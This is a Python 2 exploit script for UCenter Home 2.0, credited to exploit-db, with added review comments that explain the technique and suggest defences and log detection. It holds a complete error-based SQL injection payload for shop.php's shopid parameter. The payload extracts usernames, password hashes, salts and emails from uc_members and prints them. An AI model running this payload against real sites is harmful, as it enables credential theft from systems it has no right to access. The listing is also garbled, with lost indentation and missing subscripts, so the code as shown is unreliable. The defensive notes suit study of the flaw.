UCenter Home 2.0 EXP
#!/usr/bin/env python
import sys
import urllib2
import re
def info():
    """Print the script's provenance lines followed by its usage hint."""
    banner = (
        'From:http://www.exploit-db.com/exploits/14997/',
        'http://www.hake.cc/Web_loudong/',
        'changed:qiaoy',
        'exp:',
        ' ./UCenter_Home_2.0.py site',
    )
    # Python 2 print statement, one banner line per call, same order as the original.
    for line in banner:
        print line
# main(): command-line entry of this proof-of-concept (Python 2: print statements, urllib2).
# It expects exactly one argument (the site), requests /shop.php?ac=view with a crafted
# shopid value, and searches the response body for a MySQL "Duplicate entry" error string.
#
# NOTE(review): as extracted, this listing has lost its indentation and appears to have lost
# some subscript expressions, so it does not run as shown. It is kept verbatim as a reference
# for the request/response pattern, not as a working tool.
#
# Defender summary (the server-side code is not shown here, so the root cause is inferred):
#   * The shopid parameter presumably reaches a SQL statement without integer validation;
#     casting it to an integer or using a parameterized query closes the injection point.
#   * The technique only yields data because the database error text is echoed to the client;
#     database errors should be logged server-side and never rendered in the response.
#   * Detection: web/WAF logs showing shop.php requests whose shopid contains SQL keywords such
#     as information_schema or floor(rand(0)*2), and responses containing "Duplicate entry".
def main():
# Wrong argument count: print the banner/usage and send nothing.
if len(sys.argv) != 2:
info()
else:
site = sys.argv
# Scheme handling: the first two branches only self-assign to an otherwise unused name;
# every other value gets 'http://' prepended.
if site == 'http://':
sitesite =site
elif site == 'https://':
sitesite = site
else:
site = 'http://'+site
try:
# Error-based SQL injection carried in shopid: the nested subquery concatenates
# uid:username:password:salt:email from ucenter.uc_members (first row only) between
# '~' markers, and the GROUP BY on floor(rand(0)*2) is there to provoke a duplicate-key
# error whose message contains that concatenated value.
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
# Plain GET with urllib2; no timeout and no custom headers are set.
Value = urllib2.urlopen(url).read()
# Pull the text between the '~' markers out of the echoed MySQL error message.
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)
# The leaked value is colon-separated, matching the 0x3a separators in the query above.
hacked = Msg.split(':')
print 'Name: '+hacked
print 'Passwd:'+hacked
print 'salt: '+hacked
print 'email: '+hacked
# Bare except: any failure (network error, no match, type error) ends in the same message,
# so a non-vulnerable or patched site and a broken script are indistinguishable here.
except:
print 'Sorry,I can\'t work............'
# Script entry point: main() runs only when the file is executed directly, not on import.
if __name__ == '__main__':
    main()